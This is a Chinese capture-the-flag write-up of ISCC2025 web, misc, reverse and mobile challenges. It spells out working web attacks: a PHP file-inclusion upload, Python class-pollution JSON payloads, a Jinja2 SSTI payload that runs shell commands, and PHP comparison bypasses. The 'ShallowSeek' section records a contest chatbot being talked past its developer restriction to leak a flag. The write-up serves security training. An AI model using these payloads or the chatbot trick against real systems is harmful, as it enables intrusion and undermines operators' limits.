ISCC2025 wp
BITs2Future:lamaper,Charlie,Anyakwi
Web
战胜卞相壹
进入网页首先尝试查找可以目录,发现存在/robots.txt
1
2
3
4
|
112.126.73.173:49100/robots.txt
User-agent: *
Disallow:
f10g.txt
|
尝试访问f10g.txt失败
进而查看网站前端,发现提示:
1
|
SGF B[ae];B[ce];B[df];B[cg];B[ag];B[ai];B[ci];B[ff];B[hf];B[jf];B[gh];B[ih];B[le];B[lg];B[li];B[ni];B[oh];B[of];B[ne]
|
了解到SGF是围棋棋谱格式,由于部分围棋棋盘不存在“i”列,而本提示中存在“B[ih]”,因而认为本题中所给的棋盘包含“i”列,尝试绘图:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
import matplotlib.pyplot as plt
raw_pairs = [
"ae", "ce", "df", "cg", "ag", "ai",
"ci", "ff", "hf", "jf", "gh", "ih",
"le", "lg", "li", "ni", "oh", "of", "ne"
]
def char_to_num(c):
return ord(c.lower()) - ord('a') + 1
points = []
for pair in raw_pairs:
x = char_to_num(pair[0])
y = char_to_num(pair[1])
points.append( (x, y) )
plt.figure(figsize=(12,12))
plt.gca().invert_yaxis() #
for x in range(1,20):
for y in range(1,20):
plt.scatter(x, y, s=10, color='gray', alpha=0.5)
for (x,y) in points:
plt.scatter(x, y, s=200, color='red', edgecolor='black')
plt.text(x+0.1, y+0.1, f'({x},{y})', fontsize=8, ha='left')
plt.xticks(range(1,20), [chr(96+i) for i in range(1,20)])
plt.yticks(range(1,20), range(1,20))
plt.title("围棋坐标可视化")
plt.grid(True, alpha=0.3)
plt.savefig('go_board.png', dpi=300)
|
发现酷似
$$
2=0
$$
因而尝试访问/f12g.txt,获得flagISCC{@ll_h@ve_t2_w1n_2n_th3_ch3ssb2@rd!}
纸嫁衣6外传
对目录进行排查:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
[14:28:03] 200 - 115B - /docker-compose.yml
[14:28:03] 200 - 409B - /Dockerfile
[14:28:06] 200 - 556B - /includes/
[14:28:06] 301 - 328B - /includes -> http://112.126.73.173:49102/includes/
[14:28:06] 200 - 875B - /index
[14:28:06] 200 - 875B - /index.php
[14:28:06] 200 - 875B - /index.php/login/
[14:28:12] 403 - 282B - /server-status
[14:28:12] 403 - 282B - /server-status/
[14:28:13] 403 - 282B - /src/
[14:28:13] 301 - 323B - /src -> http://112.126.73.173:49102/src/
[14:28:15] 500 - 615B - /upload/b_user.xls
[14:28:15] 500 - 615B - /upload/1.php
[14:28:15] 500 - 615B - /upload/2.php
[14:28:15] 500 - 615B - /upload/b_user.csv
[14:28:15] 500 - 615B - /upload/upload.php
[14:28:15] 500 - 615B - /upload/test.php
[14:28:15] 500 - 615B - /upload/loginIxje.php
[14:28:15] 301 - 327B - /uploads -> http://112.126.73.173:49102/uploads/
[14:28:15] 403 - 282B - /uploads/
[14:28:15] 500 - 615B - /upload/test.txt
[14:28:15] 200 - 2KB - /upload.php
[14:28:15] 200 - 2KB - /upload
[14:28:15] 200 - 2KB - /upload/
|
在/index.php/login/得到提示,访问/includes/flag得到提示为“get”一把锤子
于是在上传文件时尝试文件包含:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
POST /upload.php HTTP/1.1
Host: 112.126.73.173:49102
Content-Length: 179
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://112.126.73.173:49102
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBZA4W8JyBuKQkfZf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://112.126.73.173:49102/upload.php?chuizi=uploads/2.txt
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryBZA4W8JyBuKQkfZf
Content-Disposition: form-data; name="file"; filename="2.txt"
Content-Type: text/plain
<?php highlight_string("/var/www/html/includes/flag.php");
------WebKitFormBoundaryBZA4W8JyBuKQkfZf--
|
在各个位置尝试chuizi,最终在根目录获得:
1
|
SVNDQ3taaDFKMUBZMV8xc181MF9GdW59
|
base64解码
1
|
ISCC{Zh1J1@Y1_1s_50_Fun}
|
究竟考什么呢
根据提示进入/SQL目录,获得代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
class T4yM7a0VbJ():
def __init__(self):
4rGkL8B3qT = SVNDQ3tGYWtlX2ZsYWd9
J5cMf90xQN = T4yM7a0VbJ()
def kzmtoa(abc, defi):
for g, h in abc.items():
if hasattr(defi, '__getitem__'):
if defi.get(g) and type(h) == dict:
kzmtoa(h, defi.get(g))
else:
defi[g] = h
elif hasattr(defi, g) and type(h) == dict:
kzmtoa(h, getattr(defi, g))
else:
setattr(defi, g, h)
def W9hT7c2fL0(I3q0Jk8sX7 = True, M8f6Uv3zG4 = True, S1t5Lm9cE2 = False, * , H4b3Qn7iA0 = True):
if S1t5Lm9cE2:
if M8f6Uv3zG4:
return '这里没有答案'
else:
return T7c1Ea4yJ9
else:
return '这里没有答案'
def w6F7zV1sEp(A5d8Lt3sM1):
if isinstance(A5d8Lt3sM1, list):
return tuple(w6F7zV1sEp(item) for item in A5d8Lt3sM1)
elif isinstance(A5d8Lt3sM1, dict):
return {key: w6F7zV1sEp(value) for key, value in A5d8Lt3sM1.items()}
else:
return A5d8Lt3sM1
@app.route('/9kU4jO6cBz',methods=['POST', 'GET'])
def p0D6Ea2iYb():
if request.data:
kzmtoa(w6F7zV1sEp(json.loads(request.data)), J5cMf90xQN)
return W9hT7c2fL0()
|
考察原型链污染,构造payload
1
|
{"__class__": {"__init__": {"__globals__": {"W9hT7c2fL0": {"__kwdefaults__": {"I3q0Jk8sX7" : true, "M8f6Uv3zG4" : false, "S1t5Lm9cE2" : ture}} }}}}
|
获得账号密码
1
2
|
F6vN+1bY9wC!Q2*aT-9e5KcU
4gD7X(SOM#pR8*rJ3+Wf6iGt
|
进入下一题,同理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
def kzmt0a(W1pS7h2eYq):
F4yU7rA2sW = (W1pS7h2eYq + "abcdefg").replace("a", "z")
return F4yU7rA2sW
def kzrntoa(M2dH8iY0fR):
E1xK9uS4jC = hashlib.md5(M2dH8iY0fR.encode('utf-8')).hexdigest()
return E1xK9uS4jC
def kzrnt0a(T3aF5cR0eY, * , fG2Wt8vDm6 = 'J8rM1tZ2sP', Z4bP9x1cTi = False):
if Z4bP9x1cTi:
if fG2Wt8vDm6 != T3aF5cR0eY:
return '不太对吧!'
else:
return Q9eX3jA5nL
else:
return '不太对吧!'
@app.route('/j7K0Ov5dLc',methods=['POST', 'GET'])
def K1tH0fY7rM():
W5aF6cR9eT = "try"
if request.data:
kzmtoa(json.loads(request.data), J5cMf90xQN)
return kzrnt0a(kzrntoa(kzmt0a(W5aF6cR9eT)))
|
按照函数逻辑,构建字符串tryabcdefg,替换字符变为tryzbcdefg,MD5编码2D692448124C16E4E4AFDD7FAEF34242
构造payload
1
|
{"__class__": {"__init__": {"__globals__": {"kzrnt0a": {"__kwdefaults__": {"fG2Wt8vDm6": "2d692448124c16e4e4afdd7faef34242", "Z4bP9x1cTi": true}}}}}}
|
获得flag
1
|
ISCC{TnxGj)9UfN=9*myGUp*t}
|
开门大吉
通过图片得知第一首歌为:有爱就不怕
第二关得到提示“jiushizhjeshouge”,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
<?php
$charMap = [
'a' => 'q', 'b' => 'w', 'c' => 'e', 'd' => 'r', 'e' => 't', 'f' => 'y', 'g' => 'u', 'h' => 'i', 'i' => 'o',
'j' => 'p', 'k' => 'a', 'l' => 's', 'm' => 'd', 'n' => 'f', 'o' => 'g', 'p' => 'h', 'q' => 'j', 'r' => 'k',
's' => 'l', 't' => 'z', 'u' => 'x', 'v' => 'c', 'w' => 'v', 'x' => 'b', 'y' => 'n', 'z' => 'm'
];
$correctAnswer = '???';
$mappedAnswer = '';
for ($i = 0; $i < strlen($correctAnswer); $i++) {
$char = $correctAnswer[$i];
$mappedAnswer.= $charMap[$char];
}
$shiftedAnswer = str_rot13($mappedAnswer);
$finalCorrectValue = base64_encode($shiftedAnswer);
$finalCorrectValue = 'ZmJr';
if (isset($_GET['kaisa'])) {
$input = $_GET['kaisa'];
$mappedInput = '';
for ($i = 0; $i < strlen($input); $i++) {
$char = $input[$i];
$mappedInput.= $charMap[$char];
}
$shiftedInput = str_rot13($mappedInput);
$encodedInput = base64_encode($shiftedInput);
if ($encodedInput === $finalCorrectValue) {
echo "kaisa只用在第二关,它能用在哪里?";
} else {
echo "输入错误,kaisa究竟等于多少呢?";
}
}
?>
|
结合“kaisa”考虑为凯撒加密
得到dcombctbymbioay,成功进入/2she2
第三关发现为SSTI,对shePOST参数发现没有回显
最后参考Jinja2-SSTI通过Server请求头带出命令回显-先知社区,构造payload
1
|
{{g.pop.__globals__.__builtins__.setattr(g.pop.__globals__.sys.modules.werkzeug.serving.WSGIRequestHandler,"server_version",g.pop.__globals__.__builtins__.__import__('os').popen('ls /').read())}}
|
得到flag
1
|
ISCC{zK_!1&c3lQEL(9,sfdzq}
|
哪吒的试炼
根据提示“食物”、“吃藕”,猜测Get参数为?food=lotus root
输入后进入http://112.126.73.173:9999/isflag.php,经过代码审计发现可疑请求
于是访问http://112.126.73.173:9999/isflag.php?source=true,获得代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
<?php
if (isset($_POST['nezha'])) {
$nezha = json_decode($_POST['nezha']);
$seal_incantation = $nezha->incantation;
$md5 = $nezha->md5;
$secret_power = $nezha->power;
$true_incantation = "I_am_the_spirit_of_fire";
$final_incantation = preg_replace(
"/" . preg_quote($true_incantation, '/') . "/", '',
$seal_incantation
);
if ($final_incantation === $true_incantation && md5($md5) == md5($secret_power) && $md5 !== $secret_power) {
show_flag();
} else {
echo "<p>封印的力量依旧存在,你还需要再试试!</p>";
}
} else {
echo "<br><h3>夜色渐深,风中传来隐隐的低语……</h3>";
echo "<h3>只有真正的勇者才能找到破局之法。</h3>";
}
?>
|
preg_replace部分构造嵌套字符串incantation=II_am_the_spirit_of_fire _am_the_spirit_of_fire
md5($md5) == md5($secret_power) && $md5 !== $secret_power是弱比较,构造科学计数法绕过:
md5 = s1836677006a
secret_power = s1665632922a
1
2
3
4
5
6
7
8
9
|
import requests
url = "http://112.126.73.173:9999/isflag.php"
payload = {
"nezha": '{"incantation": "II_am_the_spirit_of_fire_am_the_spirit_of_fire", "md5": " s1836677006a ", "power": " s1665632922a "}'
}
response = requests.post(url, data=payload)
print(response.text)
|
获得明=suoom 李=woolihc ISCC{早晴枫林红}
其中“明”=日+月=sun+moon可以看作两个单词首尾相接,李=木+子=wood+child同理
可以得到flag
sun ten sun green wood wind wood wood silk work
最终flag为ISCC{suetsueergwooniwwoooowsilrow}
回归基本功
根据提示“用户代理”选择合适的英雄“高级工程师佛耶格”
输入后进入http://112.126.73.173:9998/Q2rN6h3YkZB9fL5j2WmX.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
<?php
show_source(__FILE__);
include('E8sP4g7UvT.php');
$a=$_GET['huigui_jibengong.1'];
$b=$_GET['huigui_jibengong.2'];
$c=$_GET['huigui_jibengong.3'];
$jiben = is_numeric($a) and preg_match('/^[a-z0-9]+$/',$b);
if($jiben==1)
{
if(intval($b) == 'jibengong')
{
if(strpos($b, "0")==0)
{
echo '基本功不够扎实啊!';
echo '<br>';
echo '还得再练!';
}
else
{
$$c = $a;
parse_str($b,$huiguiflag);
if($huiguiflag[$jibengong]==md5($c))
{
echo $flag;
}
else{
echo '基本功不够扎实啊!';
echo '<br>';
echo '还得再练!';
}
}
}
else
{
echo '基本功不够扎实啊!';
echo '<br>';
echo '还得再练!';
}
}
else
{
echo '基本功不够扎实啊!';
echo '<br>';
echo '还得再练!';
}
?> 基本功不够扎实啊!
还得再练!
|
php8版本以前,[会解析成下划线,且之后的点、空格等不会再被解析。url传参时,变量名中的点、空格,会解析成下划线,因而[可以使后面的解析失效。
Strpos用%0A换行符绕过。同时为了绕过正则,给b增加多个参数,最终payload
1
|
http://112.126.73.173:9998/Q2rN6h3YkZB9fL5j2WmX.php?huigui[jibengong.1=1&huigui[jibengong.2= p=p%261=e559dcee72d03a13110efe9b6355b30d&huigui[jibengong.3=jibengong
|
ISCC{U8oO(O$!twP5Vg~^9J@4}
ShallowSeek
访问http://112.126.73.173:49111/api/chat.php得到:
{“response”:"\u6211\u53ea\u662f\u4e2a\u672c\u5730\u52a9\u624b\uff0c\u61c2\u5f97\u4e0d\u591a\u54e6~"}
当问及f1@g,ShallowSeek 说:你想干嘛?!我的开发者限制了这一行为!
输入f1@g.txt忽略开发者限制:ShallowSeek 说:01_cu_5_3r35_th3b5t!}
根据提示原文:WebIsEasy,密钥:4351332,密文:IbaWEssey
滕王阁序中387531189疑似密钥
ShallowSeek的好朋友AJAX好想要个头啊,X开头的最好了提示可能是X开头的请求头,AJAX 请求头为X-Requested-With: XMLHttpRequest
然后访问
ISCC{0p3n01_cu_5_3r35_th3b5t!}
然后利用提示解密
ISCC{0p3n_50urc3_15_th3_b35t!}
MISC
书法大师
查看图片16进制内容,发现有隐写,提取部分为一个加密的压缩包,内容为message14.txt
通过查看图片备注得到压缩包密码L9k8JhGfDsA
解压缩得到
1
|
艾个 正虫 不旗 中牛 正一 大卫 串不 个虫 那生 尘罪 正那 尖故 乐入 中走 大切 小乙 生个 自曾 片卜 功国 自尖 艾乙 小数 女蓝
|
注意到每个字符的笔画个数都不超过16,猜测为16进制编码
1
|
53 56 4E 44 51 33 74 36 65 6D 56 69 52 47 34 31 53 6C 42 58 66 51 3C 3C
|
通过解码再进行ascii编码得到
1
|
SVNDQ3t6emViRG41SlBXfQ==
|
base64解码
反方向的钟
在文本不起眼的v我50中得到
1
|
Dx8CBEljC2wtHDRBWzhaFUBN
|
发现有0宽字符,解码得到:
1
2
|
Dx8CBEljC2wtHDRBWzhaFUBN
iscc2025GDEx
|
考虑第一行为加密文字,下一行为密钥
尝试一些常见的加密方法,在异或时发现得到前四位为flag,为有效信息,故尝试异或加密
解码得到flag
1
2
3
4
5
6
7
8
|
import base64
encrypted_text = 'Dx8CBEljC2wtHDRBWzhaFUBN'
key = 'iscc2025GDEx'
encryptedbytes = base64.b64decode(encrypted_text)
keybytes = key.encode('utf-8')
decryptedbytes = bytes([encryptedbytes[i] ^ keybytes[i % len(keybytes)] for i in range(len(encryptedbytes))])
flag = decryptedbytes.decode('utf-8')
print(flag)
|
REVERSE
我爱看小品
获得的附件为something,无显著特征
通过die发现是elf文件,在IDA中发现多次出现含“py”字样的函数,考虑可能为pyinstaller打包后的文件
通过pyinstxtractor解包得到
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
import mypy, yourpy
def something():
print(" 打工奇遇")
print("宫室长悬陇水声")
print("廷陵刻此侈宠光")
print("玉池生肥咽不彻")
print("液枯自断仙无分")
print("酒醒玉山来映人")
def check():
your_input = input()
if your_input[None[:5]] == "ISCC{" and your_input[-1] == "}":
print("Come along, you'll find the answer!")
else:
print("Flag is wrong!")
if __name__ == "__main__":
mypy.myfun()
something()
print("Please enter flag:")
check()
|
以及在其他文件中得到密码为yibaibayibei1801
进入动态调试,直接运行程序,输入密码
得到flag
1
|
ISCC{pyinstaller_is_very_interesting}
|
SP
根据题目提示,程序应当有壳,通过查壳发现为upx,利用upx脱壳工具https://www.52pojie.cn/thread-2026356-1-1.html得到程序,进入IDA,找到主程序,发现可疑函数obfDB()
在return处打上断点,动态调试查看结果
发现
1
2
3
4
5
6
7
8
|
Stack[00005AB8]:000000000079FCE0 db 49h ; I
Stack[00005AB8]:000000000079FCE1 db 53h ; S
Stack[00005AB8]:000000000079FCE2 db 43h ; C
Stack[00005AB8]:000000000079FCE3 db 43h ; C
Stack[00005AB8]:000000000079FCE4 db 7Bh ; {
Stack[00005AB8]:000000000079FCE5 db 4Dh ; M
Stack[00005AB8]:000000000079FCE6 db 38h ; 8
Stack[00005AB8]:000000000079FCE7 db 24h ; $
|
同理继续断点得到后半部分flag
最终
MOBILE
Encode
下载apk后,选择lib/x86_64/libencode与lib/x86/libencode拖入IDA进行分析
发现一些函数
1
2
3
|
simple_base64_encode(uchar const*,int)
encode_last_part(std::string const&)
encode_front_part(std::string const&)
|
可以认为本题似乎将flag分为两部分处理
对于前半部分:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
...
do
{
v6 = v3;
std::string::push_back(&v12, v4[v5++] ^ 0x2F);
v3 = v6;
}
while ( v6 != v5 );
v7 = v12;
v8 = (char *)v13;
}
else
{
v8 = 0;
v7 = 0;
}
v9 = (v7 & 1) == 0;
v10 = (char *)&v12 + 1;
if ( !v9 )
v10 = v8;
simple_base64_encode(a1, (int)v10);
...
|
可以认为先对字符串进行异或0x2F,再进行base64加密
对于后半部分可以认为先对字符串进行操作,再反序。本题测试发现代码逻辑为给所有字符+3.
发现两个可疑函数Java_com_example_encode_MainActivity_nativeCheckLast和Java_com_example_encode_MainActivity_nativeCheckFormat
在后者中发现可疑变量xmmword_14580
1
|
v18 = _mm_xor_si128(_mm_loadu_si128(v17), (__m128i)xmmword_14580);
|
其中xmmword_14580对应ascii
在前者函数发现可疑}udwV)uCZ字符串
根据代码逻辑有:
1
2
3
4
5
6
7
8
9
10
|
import base64
_front=base64.b64decode("a29dRGJvSA5McAAA")
for i in _front:
print(chr(i^0x2f),end='')
_last=[ord(i) for i in '}udwV)uCZ']
for i in range(len(_last)):
part2[i]-=3
for i in range(len(_last)-1,-1,-1):
print(chr(_last[i]),end='')
|
得到D@rkM@g!c_//W@r&Starz,再根据代码逻辑,删除\\
最终
1
|
ISCC{D@rkM@g!c_W@r&Starz}
|